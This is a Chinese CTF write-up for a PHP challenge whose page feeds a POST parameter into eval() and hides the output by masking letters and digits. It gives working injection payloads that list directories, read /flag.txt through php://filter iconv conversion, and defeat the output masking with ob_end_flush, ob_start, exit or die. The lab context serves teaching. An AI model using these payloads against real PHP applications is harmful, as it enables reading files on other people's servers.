信息收集
下载index.php并查看
php
error_reporting(0);
ini_set('display_errors', 0);
// 你们在炫技吗?
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
$s = ob_get_contents();
ob_end_clean();
echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
highlight_file(__FILE__);
}ob_get_contents:可以获取缓冲区中的内容,并将其存储在变量中,以便进一步处理或保存。
ob_end_clean:用于清空输出缓冲区的内容,并关闭输出缓冲。
preg_replace:按照正则表达式替换字符,这里是将0-9 a-z替换成?
没什么用的小知识:
众所周不知,我们输出的时候,比如print是将内容发送到缓冲区的,然后系统会在恰当的时机自动帮我们把缓冲区的内容输出打印。这是我学C++的时候学的,我大胆猜测php原理大致相似。
解题
ob_end_clean删除最上面的输出缓冲区并输出其内容。
那么解题思路是不让他清空,而是让它在清空前打印出来就好了
查看PHP 输出控制函数,看看有什么函数可以利用的
利用php输出控制函数
这几个函数都可以:
php
ob_end_flush();
ob_flush();
ob_get_flush();
ob_start();前三个原理都是提前输出
ob_start是创建一个新的缓冲区,而ob_end_clean()是删除最顶层的输出缓冲区及其所有内容,这刚好删除了最新创建的那个缓冲去的所有内容,保护了之前的那个缓冲区。
s
new buffer --> ob_end_clean
eval($c) buffer
other buffer
......flag.php显然没有flag,查根目录flag在/flag.txt
php
c=var_export(scandir('.'));ob_end_flush();
c=include("php://filter/convert.iconv.utf8.utf16/resource=flag.php");ob_flush();
c=var_export(scandir('/'));ob_get_flush();
c=include("php://filter/convert.iconv.utf8.utf16/resource=/flag.txt");ob_start();解题的截图放在最后
程序提前死亡
只要程序提前死了,那么后续的代码就不会执行了
php
c=var_export(scandir('/'));exit();
c=include("php://filter/convert.iconv.utf8.utf16/resource=/flag.txt");die();
这一题的重点在于绕过ob_end_clean删除缓冲区,所以关于读目录和关于读文件的更多方法不再展示,有需要可以观看前面的章节。